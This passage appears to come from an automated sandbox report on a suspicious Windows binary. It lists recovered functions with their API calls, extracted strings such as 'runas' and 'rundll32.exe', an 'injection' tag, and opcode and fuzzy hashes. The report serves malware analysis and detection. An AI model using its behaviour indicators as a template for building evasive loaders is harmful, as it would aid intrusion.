                                          • HttpOpenRequestA.WININET(00000000,00000000,?,00000000,00000000,00000000,00000000,00000001), ref: 00F06C23
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.667193143.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 0000000B.00000002.667030042.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667232103.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667359564.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667366921.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: InternetOpen$ConnectHttpRequest
                                          • String ID:
                                          • API String ID: 3864186401-0
                                          • Opcode ID: fe02469e7b395aafa7f7b638343f604b8c102cdcd777d53a2eec94d001c092dd
                                          • Instruction ID: 539e3bca97ee9585aace59da60c2b42bb484732cc50c30d894c1478d920869a2
                                          • Opcode Fuzzy Hash: fe02469e7b395aafa7f7b638343f604b8c102cdcd777d53a2eec94d001c092dd
                                          • Instruction Fuzzy Hash: 1591D170A00208EBEF14EFA8CC4ABAE7B76EF45304F504558F801672C2D7B59A84ABD1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F1BF44, Relevance: 12.2, APIs: 8, Instructions: 203COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.667193143.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 0000000B.00000002.667030042.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667232103.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667359564.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667366921.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _free$___from_strstr_to_strchr
                                          • String ID:
                                          • API String ID: 3409252457-0
                                          • Opcode ID: f49a4844869e60c97c480962947a921da5121796251772d3abc08c1b5554a984
                                          • Instruction ID: 4f6c93195220455d7dddc8481c86e4e5919188ddb64d57934aa37be95d890888
                                          • Opcode Fuzzy Hash: f49a4844869e60c97c480962947a921da5121796251772d3abc08c1b5554a984
                                          • Instruction Fuzzy Hash: 0251F571D84255EFDB20AFB49C42AFE7BA4AF05720F044169E510E7282EB7699C0FBD4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F171AC, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.667193143.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 0000000B.00000002.667030042.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667232103.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667359564.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667366921.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID: api-ms-$ext-ms-
                                          • API String ID: 0-537541572
                                          • Opcode ID: 082c091e63ecc1a547019d3dd37f1d6e0de4db683b6279a7a499c91f30c30612
                                          • Instruction ID: 75b676ea6c2c3a7438d30b1b479ed4d7ff38c85734e556b356bfdc374de42676
                                          • Opcode Fuzzy Hash: 082c091e63ecc1a547019d3dd37f1d6e0de4db683b6279a7a499c91f30c30612
                                          • Instruction Fuzzy Hash: 3A21C632E0D365E7CB316A649C45EDA36789F557B0B210150FD1EA7290D670DD42BEE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F1C8A8, Relevance: 10.6, APIs: 7, Instructions: 65COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00F1C870: _free.LIBCMT ref: 00F1C895
                                          • _free.LIBCMT ref: 00F1C8F6
                                            • Part of subcall function 00F16601: HeapFree.KERNEL32(00000000,00000000,?,00F156FE), ref: 00F16617
                                            • Part of subcall function 00F16601: GetLastError.KERNEL32(?,?,00F156FE), ref: 00F16629
                                          • _free.LIBCMT ref: 00F1C901
                                          • _free.LIBCMT ref: 00F1C90C
                                          • _free.LIBCMT ref: 00F1C960
                                          • _free.LIBCMT ref: 00F1C96B
                                          • _free.LIBCMT ref: 00F1C976
                                          • _free.LIBCMT ref: 00F1C981
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.667193143.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 0000000B.00000002.667030042.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667232103.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667359564.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667366921.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 17f53bcb001aa0cf27f4b28cdacd85efe4fe4569033449001c41b86b803b0e8a
                                          • Instruction ID: ae99d7b38919dfe8271687c870b6ddecb38f14b375620b11c9c92f2a55da8c6a
                                          • Opcode Fuzzy Hash: 17f53bcb001aa0cf27f4b28cdacd85efe4fe4569033449001c41b86b803b0e8a
                                          • Instruction Fuzzy Hash: 171181715D0B04FAEA20B7B1CC87FCBB79D9F01710F400824B299EA052EB3AF595A6D0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F18457, Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetConsoleCP.KERNEL32(?,00F03D80,00000000), ref: 00F1849F
                                          • __fassign.LIBCMT ref: 00F1867E
                                          • __fassign.LIBCMT ref: 00F1869B
                                          • WriteFile.KERNEL32(?,00F03D80,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00F186E3
                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00F18723
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00F187CF
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.667193143.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 0000000B.00000002.667030042.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667232103.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667359564.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667366921.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: FileWrite__fassign$ConsoleErrorLast
                                          • String ID:
                                          • API String ID: 4031098158-0
                                          • Opcode ID: bfc57a3ab12627543edbcb214e8d0106a7a4622198de0fb353bc227abab10988
                                          • Instruction ID: 4f8109bb12adb53f58e68d9cff3a59482443a8845a86bc19a978a294444e78fb
                                          • Opcode Fuzzy Hash: bfc57a3ab12627543edbcb214e8d0106a7a4622198de0fb353bc227abab10988
                                          • Instruction Fuzzy Hash: AFD1AC75D002589FCF15CFA8C9809EDBBB5FF48364F28016AE855BB281DB30AD86DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F10E44, Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLastError.KERNEL32(?,?,00F10E3B,00F10CA9,00F105B7), ref: 00F10E52
                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F10E60
                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F10E79
                                          • SetLastError.KERNEL32(00000000,00F10E3B,00F10CA9,00F105B7), ref: 00F10ECB
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.667193143.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 0000000B.00000002.667030042.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667232103.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667359564.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667366921.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ErrorLastValue___vcrt_
                                          • String ID:
                                          • API String ID: 3852720340-0
                                          • Opcode ID: e168135850fdd57b9c0da97ad267b2e50f27a97e2921464c3c35722c35b894b8
                                          • Instruction ID: e0a2ab848f5c19e22d65207dd5d9b902276e458e224a63ff5740201f04205297
                                          • Opcode Fuzzy Hash: e168135850fdd57b9c0da97ad267b2e50f27a97e2921464c3c35722c35b894b8
                                          • Instruction Fuzzy Hash: 4201D473A09716AEE62827767D95AD73A59FB05774B20062AF614801E2EFA64CC1B240
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F02890, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127threadsleepinjectionCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00F0EF20: Concurrency::cancel_current_task.LIBCPMT ref: 00F0F041
                                          • CreateThread.KERNEL32(00000000,00000000,00F02820,00000000,00000000,00000000), ref: 00F028F6
                                          • Sleep.KERNEL32(00001388,?,?,?,?,?,?,?,?,?,?), ref: 00F02903
                                          • SuspendThread.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F0290A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.667193143.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 0000000B.00000002.667030042.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667232103.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667359564.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667366921.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Thread$Concurrency::cancel_current_taskCreateSleepSuspend
                                          • String ID: runas$rundll32.exe
                                          • API String ID: 1039963361-4081450877
                                          • Opcode ID: 2f5dbe5ef64bf05b31267eaaf00befafe7a3e29448090706a31fd86969f80c11
                                          • Instruction ID: 4f1d42ecaee7bb2431aceeee8149a81acf702f92cda62e71070a1b0de05a43fa
                                          • Opcode Fuzzy Hash: 2f5dbe5ef64bf05b31267eaaf00befafe7a3e29448090706a31fd86969f80c11
                                          • Instruction Fuzzy Hash: 66411831210248ABEB68DF28CC99B9D3B56EF45311F508618F955973D6CB39D4C0BB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F12C0B, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.667193143.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 0000000B.00000002.667030042.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667232103.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667359564.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667366921.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _wcsrchr
                                          • String ID: .bat$.cmd$.com$.exe
                                          • API String ID: 1752292252-4019086052
                                          • Opcode ID: e691bc8ca52c1fa40ef4a6ba9725ce27e2482b8d9f0f7491b04321e0b8dfefbf
                                          • Instruction ID: 004d19dd4347b9d2438e4a0603e5e8ca78f51bbc5df1729760b07b660a92e675
                                          • Opcode Fuzzy Hash: e691bc8ca52c1fa40ef4a6ba9725ce27e2482b8d9f0f7491b04321e0b8dfefbf
                                          • Instruction Fuzzy Hash: 28012B27E0C326259A546099BE426BE73A98F91BB0725002AFD48F71C0EE8CDDA231D1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F11154, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.667193143.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 0000000B.00000002.667030042.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667232103.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667359564.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667366921.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID: api-ms-
                                          • API String ID: 0-2084034818
                                          • Opcode ID: 55b8a61b326b4f047550f42585da118a3d0b9c854c66dbbd43fb993e988c7387
                                          • Instruction ID: c1e3304fdaa29ac71ae50cd16d98c64eca04d29f0bc64d8f22151a22fcb9f17d
                                          • Opcode Fuzzy Hash: 55b8a61b326b4f047550f42585da118a3d0b9c854c66dbbd43fb993e988c7387
                                          • Instruction Fuzzy Hash: E0119636E0A629FBCB229BA49C44B9BB75CBF017B0B210151EF05B7290D630DE41F6E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F12203, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00F121F8,?,?,00F121C0,?,?,?), ref: 00F12218
                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00F1222B
                                          • FreeLibrary.KERNEL32(00000000,?,?,00F121F8,?,?,00F121C0,?,?,?), ref: 00F1224E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.667193143.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 0000000B.00000002.667030042.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667232103.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667359564.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667366921.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: AddressFreeHandleLibraryModuleProc
                                          • String ID: CorExitProcess$mscoree.dll
                                          • API String ID: 4061214504-1276376045
                                          • Opcode ID: 7567cf7be4e3f0b54ca404668debd50db6737ef08af4b819c84c3c849ea1c1f4
                                          • Instruction ID: 2a24dca367571b9b11d253c7c0827ad25737b88deab74899620797e2b45a5201
                                          • Opcode Fuzzy Hash: 7567cf7be4e3f0b54ca404668debd50db6737ef08af4b819c84c3c849ea1c1f4
                                          • Instruction Fuzzy Hash: FCF08230A08358FBEB21AB90DD0ABDEBA68EF40765F000090F800A11A0CB708E55FE90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F1E774, Relevance: 7.9, APIs: 5, Instructions: 373timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.667193143.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 0000000B.00000002.667030042.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667232103.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667359564.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667366921.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _free$InformationTimeZone
                                          • String ID:
                                          • API String ID: 597776487-0
                                          • Opcode ID: 455158028eec0a0dda9f1a5341edebcb33696c51bfbd6c875ae658f1ec1f8263
                                          • Instruction ID: f2f82db751405eddc8c1c667687e9220f8e89be49ff21b34b833701b0745aeda
                                          • Opcode Fuzzy Hash: 455158028eec0a0dda9f1a5341edebcb33696c51bfbd6c875ae658f1ec1f8263
                                          • Instruction Fuzzy Hash: E0C10772E002099BDB249F68DC51BEA7BA9AF56330F144069EC91D7281E7399DC1F750
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F04010, Relevance: 7.7, APIs: 5, Instructions: 235libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetVersionExW.KERNEL32(0000011C), ref: 00F04066
                                          • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00F040C0
                                          • GetProcAddress.KERNEL32(00000000), ref: 00F040C7
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.667193143.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 0000000B.00000002.667030042.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667232103.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667359564.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667366921.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: AddressHandleModuleProcVersion
                                          • String ID:
                                          • API String ID: 3310240892-0
                                          • Opcode ID: 422bd93b7d7ba0a1b1abeaefd6b8b21443b6aa7ea962f21272e41fd5714f0cc0
                                          • Instruction ID: 347e4abb2f91027506e58c245e54fd4810330896cfd7daffc8b78f881daaa0d5
                                          • Opcode Fuzzy Hash: 422bd93b7d7ba0a1b1abeaefd6b8b21443b6aa7ea962f21272e41fd5714f0cc0
                                          • Instruction Fuzzy Hash: 4C7106B1E092089BEB20DB68EC453ADB7A5EB45324F50029AED04D76D1EB75ADC0B7C1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F12943, Relevance: 7.6, APIs: 5, Instructions: 141pipeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00F12875), ref: 00F12965
                                          • GetFileInformationByHandle.KERNEL32(?,?), ref: 00F129BF
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00F12875,?,000000FF,00000000,00000000), ref: 00F12A4D
                                          • __dosmaperr.LIBCMT ref: 00F12A54
                                          • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00F12A91
                                            • Part of subcall function 00F12CB9: __dosmaperr.LIBCMT ref: 00F12CEE
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.667193143.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 0000000B.00000002.667030042.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667232103.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667359564.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667366921.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                                          • String ID:
                                          • API String ID: 1206951868-0
                                          • Opcode ID: 3d988c6843b6922ce9369c9aa99c8ad66b5ff18b42cc6d77d1c914ceba6ca856
                                          • Instruction ID: a412e5c5be4cf041d42b0657d6fb27dcfd88fac7031a23fa66aea2aa1c3ce5ff
                                          • Opcode Fuzzy Hash: 3d988c6843b6922ce9369c9aa99c8ad66b5ff18b42cc6d77d1c914ceba6ca856
                                          • Instruction Fuzzy Hash: 29416A71900248AFCB64DFA5DC459EFBBF9EF88310B004529F856D3210EA38A991EB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F1C807, Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                          Download Yara Rule
                                          APIs
                                          • _free.LIBCMT ref: 00F1C81F
                                            • Part of subcall function 00F16601: HeapFree.KERNEL32(00000000,00000000,?,00F156FE), ref: 00F16617
                                            • Part of subcall function 00F16601: GetLastError.KERNEL32(?,?,00F156FE), ref: 00F16629
                                          • _free.LIBCMT ref: 00F1C831
                                          • _free.LIBCMT ref: 00F1C843
                                          • _free.LIBCMT ref: 00F1C855
                                          • _free.LIBCMT ref: 00F1C867
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.667193143.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 0000000B.00000002.667030042.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667232103.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667359564.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667366921.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: fd3da74598354c4db74373f5f4a704a7e3771cda13ae06719dd9ef601b5969f9
                                          • Instruction ID: 2cd6093a0d76ddfb56a819604a7b1fd39b4a16780cca96ed1ed2727ba869d77a
                                          • Opcode Fuzzy Hash: fd3da74598354c4db74373f5f4a704a7e3771cda13ae06719dd9ef601b5969f9
                                          • Instruction Fuzzy Hash: 8EF03632954214E7C620EB99E9C5C96B3DEAB04730754081AF049DB511CF36FCC0AAE4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F1AED3, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.667193143.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 0000000B.00000002.667030042.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667232103.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667359564.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667366921.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _free
                                          • String ID: *?
                                          • API String ID: 269201875-2564092906
                                          • Opcode ID: 6fdf12bd1c53e25703f060ec6a84bb1bceeb49536af37bdc1a4211a2d5ee5eb1
                                          • Instruction ID: 9df18ecc0cea98f3ffc86d4444923fe833f34cd032c62c8eda1bc48c41e2e497
                                          • Opcode Fuzzy Hash: 6fdf12bd1c53e25703f060ec6a84bb1bceeb49536af37bdc1a4211a2d5ee5eb1
                                          • Instruction Fuzzy Hash: 03611DB6D00219DFDB14CFA8C8819EEFBF5EF48320B258169E855E7340D775AE819B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F0AFF0, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 113COMMON
                                          Download Yara Rule
                                          APIs
                                          • std::_Xinvalid_argument.LIBCPMT ref: 00F0BFE4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.667193143.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 0000000B.00000002.667030042.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667232103.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667359564.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667366921.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Xinvalid_argumentstd::_
                                          • String ID: :::$invalid stoi argument$stoi argument out of range
                                          • API String ID: 909987262-1139504419
                                          • Opcode ID: 7adf3bb9fa27d8cc1718d4e05a2d04bb61ea5fcb3fcbdc3d9133f69266e13877
                                          • Instruction ID: 4beaf551f9e128f86657e8e000aad1610c4b605748724f9c72d5216b409633ec
                                          • Opcode Fuzzy Hash: 7adf3bb9fa27d8cc1718d4e05a2d04bb61ea5fcb3fcbdc3d9133f69266e13877
                                          • Instruction Fuzzy Hash: A841B2712011465BEF28AF68CC9579D7A659F81344F104628F8298B2D3CB7995C4BF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F1980A, Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.667193143.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 0000000B.00000002.667030042.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667232103.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667359564.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667366921.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _strrchr
                                          • String ID:
                                          • API String ID: 3213747228-0
                                          • Opcode ID: 9c1b9633bf2ebb0c38044de2cea86c35c0b20e39aea4a82805dce46aa4bcbc2e
                                          • Instruction ID: f06492807b474b32c7e02576c6d80f73d4a240b33c2889c9e61364205b6c53db
                                          • Opcode Fuzzy Hash: 9c1b9633bf2ebb0c38044de2cea86c35c0b20e39aea4a82805dce46aa4bcbc2e
                                          • Instruction Fuzzy Hash: 8EB17A32D082459FDB11CF28C8A17EEBBF5EF55320F18416AD845DB241D6B89E81EBE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F042C0, Relevance: 6.1, APIs: 4, Instructions: 146libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetVersionExW.KERNEL32(0000011C,?,?,00000000), ref: 00F04316
                                          • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00F04375
                                          • GetProcAddress.KERNEL32(00000000), ref: 00F0437C
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.667193143.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 0000000B.00000002.667030042.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667232103.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667359564.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667366921.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: AddressHandleModuleProcVersion
                                          • String ID:
                                          • API String ID: 3310240892-0
                                          • Opcode ID: a0b66cf4b52a737756775518e95d96bf65e7da6653e8e3a99e10767652fdab3c
                                          • Instruction ID: 4969dc2fc96d20be2d90289c58f0b7e523270f4117ffb450619f2c5173ac89ce
                                          • Opcode Fuzzy Hash: a0b66cf4b52a737756775518e95d96bf65e7da6653e8e3a99e10767652fdab3c
                                          • Instruction Fuzzy Hash: 924148B1E002189BDB24FB68DC4A7DEB775EF41320F5042A8ED00972D1EB356984BBD2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F2166E, Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _free.LIBCMT ref: 00F2173E
                                          • _free.LIBCMT ref: 00F21767
                                          • SetEndOfFile.KERNEL32(00000000,00F1DB46,00000000,00F1649E,?,?,?,?,?,?,?,00F1DB46,00F1649E,00000000), ref: 00F21799
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,00F1DB46,00F1649E,00000000,?,?,?,?,00000000), ref: 00F217B5
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.667193143.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 0000000B.00000002.667030042.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667232103.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667359564.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667366921.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _free$ErrorFileLast
                                          • String ID:
                                          • API String ID: 1547350101-0
                                          • Opcode ID: 2514977b5b3b4c72c1492fc0170f91d924586d8bfeb94dc7b91167dae898deb0
                                          • Instruction ID: 837f82011660e9884bd2528ac5cf90f25e01a264b70484aa3ea4e24e480728bc
                                          • Opcode Fuzzy Hash: 2514977b5b3b4c72c1492fc0170f91d924586d8bfeb94dc7b91167dae898deb0
                                          • Instruction Fuzzy Hash: 3841D732900655ABDB11ABB8DC46BDE3BB5BFA4330F240110F824E7191EB39D994B764
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F1AE04, Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00F12687: _free.LIBCMT ref: 00F12695
                                            • Part of subcall function 00F1BDDB: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,00F211E0,?,00000000,00000000), ref: 00F1BE7D
                                          • GetLastError.KERNEL32 ref: 00F1AE6C
                                          • __dosmaperr.LIBCMT ref: 00F1AE73
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00F1AEB2
                                          • __dosmaperr.LIBCMT ref: 00F1AEB9
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.667193143.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 0000000B.00000002.667030042.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667232103.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667359564.0000000000F30000.00000004.00020000.sdmp Download File
